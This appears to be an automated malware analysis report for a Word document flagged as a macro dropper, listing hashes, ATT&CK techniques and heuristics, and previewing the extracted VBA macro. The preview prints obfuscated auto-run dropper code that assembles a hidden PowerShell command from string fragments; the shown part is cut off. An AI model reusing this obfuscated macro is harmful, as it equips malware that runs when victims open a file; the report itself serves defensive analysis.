Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 70f57e2a718c7ef0…

MALICIOUS

Office (OLE)

149.2 KB Created: 2018-06-22 11:38:00 Authoring application: Microsoft Office Word First seen: 2018-07-14
MD5: 3b7044b040ece1c0457e1a74dec5d8b1 SHA-1: 4dac23f2c518ad61d57acb28fb407a24dd7337c0 SHA-256: 70f57e2a718c7ef0df5b1b7df0cebf9a7aa65e67f1d6636e816780a8439fe045
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function, a critical heuristic firing, indicating an attempt to execute external commands. This is further supported by the ClamAV detection name 'Doc.Dropper.Agent-6586649-0', suggesting a dropper functionality. The presence of an AutoOpen macro indicates it will execute automatically upon opening.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6585607-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6585607-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 29096 bytes
SHA-256: 7b3e51a4c03abeb2cbd206ed78ff3ea165efefc910ce3965ba15c72ad908c06a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "iWFMvNizNOw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "HmCNbzNhIiW"
Function qAHwXkaRw()
On Error Resume Next
pwXJGz = (zRQCj * 74759 + 18002 * CInt(XqWbpl - CDbl(8601)) * 63195 * Oct(7362))
CwioM = "Hel" + "l  " + ".(" + " $" + "veR" + "bo" + "SE"
CClRKL = (MMRCLc * 5034 + 57278 * CInt(JTzvk - CDbl(37345)) * 23569 * Oct(44913))
ENlqEBiIw = "pr" + "EF" + "er" + "eN"
ZKnlsk = (TYDzo * 66552 + 13824 * CInt(FXZrt - CDbl(22267)) * 26245 * Oct(39199))
sUkbTR = "Ce." + "tO" + "sTR"
cckjIA = (qNlkAJ * 50919 + 38992 * CInt(krDwjZ - CDbl(51941)) * 24348 * Oct(83927))
SPXzAPIl = "inG" + "()" + "[1," + "3]+"
qAHwXkaRw = CwioM + ENlqEBiIw + sUkbTR + SPXzAPIl
NtUdUM = (pJQzhL * 47611 + 39353 * CInt(awWEv - CDbl(94459)) * 10823 * Oct(21158))
End Function
Function OknAlmWFT()
On Error Resume Next
TJVRD = (XsRmp * 42554 + 68655 * CInt(XKTRD - CDbl(63272)) * 6392 * Oct(62094))
MfmJiLHVvrJ = "'x" + "'-" + "jOI" + "n'" + "')(" + " [" + "st"
iawipm = (QnJVAC * 40141 + 47523 * CInt(Ocptl - CDbl(59102)) * 70156 * Oct(82232))
NsEmWXSqjXr = "RI" + "ng" + "]:"
wucjBi = (nfrrE * 44654 + 65963 * CInt(XWBMO - CDbl(33351)) * 41892 * Oct(79393))
NzlBR = ":J" + "Oin" + "( '" + "' " + ", (" + " '3"
KoENmt = (pHwqsS * 69191 + 73467 * CInt(QNXdhB - CDbl(84168)) * 87907 * Oct(69196))
LrjwdKTsdsz = "7M9" + "8s6" + "6U" + "99"
PcXcN = (FhVMZr * 1630 + 73146 * CInt(BwYrNE - CDbl(74661)) * 30070 * Oct(64376))
PvZkfV = "P10" + "9k" + "96s" + "33" + "M6" + "0_3"
EwLNJz = (dPdWR * 60033 + 71467 * CInt(mlOZG - CDbl(48707)) * 23408 * Oct(71377))
zOCHzFH = "3t" + "11" + "1e" + "100" + "e1" + "18M" + "44_"
OknAlmWFT = MfmJiLHVvrJ + NsEmWXSqjXr + NzlBR + LrjwdKTsdsz + PvZkfV + zOCHzFH
jETCWS = (NqfJit * 37971 + 22353 * CInt(ONkIU - CDbl(68540)) * 33935 * Oct(75150))
End Function
Function RuUhMFatIX()
On Error Resume Next
aSYqbY = (NYhFdJ * 14043 + 95555 * CInt(JbAbi - CDbl(85932)) * 34447 * Oct(6128))
IwAiqcjph = "110" + "k9" + "9U" + "10" + "7s" + "10" + "0s9"
sMbdS = (mjXvzE * 44400 + 28557 * CInt(RRVmG - CDbl(72897)) * 9507 * Oct(11449))
hibCVnVA = "8e" + "117" + "_3" + "3s1" + "15" + "e96" + "_1"
GKIRLv = (AUjjMQ * 70158 + 13321 * CInt(SzlLwz - CDbl(73980)) * 24534 * Oct(87304))
fCpzrWwFUS = "11M" + "10" + "1_1" + "10k" + "10" + "8t5"
RXfwX = (GnWHoV * 40473 + 55086 * CInt(wjqfu - CDbl(758)) * 62661 * Oct(27154))
GOPfL = "8k" + "37_" + "87>" + "71"
ooTup = (YvYBd * 19943 + 41359 * CInt(IwGcN - CDbl(99744)) * 92795 * Oct(93817))
lmYrRFBD = "U1" + "16" + "U7" + "0M" + "96M"
IzzOvh = (JlJdIj * 37159 + 22196 * CInt(NitzTz - CDbl(6846)) * 55878 * Oct(21484))
PIVjA = "33t" + "60" + "_33" + "P1" + "11c"
joXSOF = (MLzpuc * 26928 + 48556 * CInt(sArQYc - CDbl(89496)) * 57803 * Oct(186))
jrcHRcV = "10" + "0s1" + "18" + "t44" + ">1"
RuUhMFatIX = IwAiqcjph + hibCVnVA + fCpzrWwFUS + GOPfL + lmYrRFBD + PIVjA + jrcHRcV
DzIJt = (CNwKm * 35547 + 90911 * CInt(QWIOJ - CDbl(36313)) * 11064 * Oct(59941))
End Function
Function HXqoFjPtPRH()
On Error Resume Next
cGClv = (GttSw * 4830 + 84895 * CInt(BDSrP - CDbl(30599)) * 28671 * Oct(8793))
vTOqz = "10P" + "99e" + "10" + "7_"
FUzCU = (UhLXbf * 4594 + 83020 * CInt(HDrQtz - CDbl(96758)) * 41178 * Oct(47001))
CWJdjIf = "10" + "0P9" + "8t1" + "17P" + "33" + "t8"
GLqaq = (JYhzQ * 91721 + 14054 * CInt(NYlliQ - CDbl(48129)) * 99073 * Oct(23258))
IufhKwiscQj = "2U" + "120" + "M1"
kMYwLZ = (wbjOV * 56582 + 12105 * CInt(ISHVu - CDbl(39614)) * 23196 * Oct(92836))
npjoC = "14" + "P11" + "7M" + "10" + "0P"
CUOMq = (tGzJq * 57556 + 83098 * CInt(MHpSU - CDbl(45111)) * 43510 * Oct(86148))
YInRvC = "10" + "8t4" + "7c" + "79c" + "100" + "k11"
HXqoFjPtPRH = vTOqz + CWJdjIf + IufhKwiscQj + npjoC + YInRvC
fPVwRi = (MYPRv * 82800 + 22212 * CInt(HTqIVT - CDbl(29959)) * 83779 * Oct(33558))
End Function
Function lkKsdIBWO()
On Error Resume Next
uNECr
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.